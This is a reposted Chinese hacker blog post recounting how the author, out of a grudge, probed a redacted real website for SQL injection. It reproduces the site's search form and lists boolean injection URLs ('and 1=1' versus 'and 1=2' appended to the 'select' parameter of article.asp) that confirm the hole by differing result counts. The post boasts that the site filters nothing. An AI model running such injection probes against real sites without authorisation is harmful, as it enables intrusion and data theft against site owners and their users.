[转载]叉叉联盟SQL注射漏洞

文章作者：浪心

这个并不是我一个人的原创了，而是和朋友一起研究的。而且涉及的站点更加不好惹。
所谓的不好惹，并不是怕了他们，而是因为他们都是一些泼皮无赖。所以，这篇文章
只是给你个人看的，就不要发表了。OK?

=======================================================================

http://www.[此段屏蔽].com/

[此段屏蔽]又开张了，以前他作恶多端，现在好象改好了，但是心中的恶气还是难以
平复，所以我开始了继续测试的道路。
看下整站，很难判断是什么整站，但是不影响寻找漏洞，随便找些？id=XX
这样的测试，没结果，脑子里一直在想，他的站不可能去看整站的安全，一定保留以前整站的资料

目光就这样找啊找啊，终于，我看到了什么？

http://www.[此段屏蔽].com/web/article.asp?cat_id=8

看到了，文章搜索

搜索文章标题 搜索文章内容 ，哈哈，好玩

就从这里下手

啊哼

看下源代码：（
<form name="form2" method="post" action="article.asp">
<tr>

<td bgcolor="#77E3FF" align="center" height="22" class="chinese"><font color="#666666"><strong>文章搜索</strong></font></td>
</tr>
<tr>

<td bgcolor="#FFFFFF" align="center"> <br>
<select name="select">
<option value="art_title">搜索文章标题</option>
<option value="art_content">搜索文章内容</option>
</select>
<br>
<input type="text" name="keyword" class="textarea">
<br>
<input type="submit" name="search" value=" 搜索 " class="button">
</td>
</tr>
</form>


SEE，这样说，我们模拟下提交文章标题为1的文章

http://www.[此段屏蔽].com/web/article.asp?select=art_title&keyword=1%20and%201=1
继续
and%201=2
啊哈，失败了
大胆判断SQL是写成这样的
like &#39;%1%&#39;&#39;
加了&#39;
不能灰心，换个位置来

http://www.[此段屏蔽].com/web/article.asp?keyword=1&select=art_title%20and%201=1
共搜索到239篇文章

http://www.[此段屏蔽].com/web/article.asp?keyword=1&select=art_title%20and%201=2
共搜索到0篇文章

换and 3=3
and 3=4
成功，切，菜，这里都不会过滤。
哎~~~~~~~~``懒的动弹，就这样去吧，找漏洞与黑没什么区别，只是脑力与体力的区别罢了

ps: 江南燕最近表现不错.其他技术群成员也希望努力学习.别灌水.赫赫.....
[敏感内容屏蔽了.]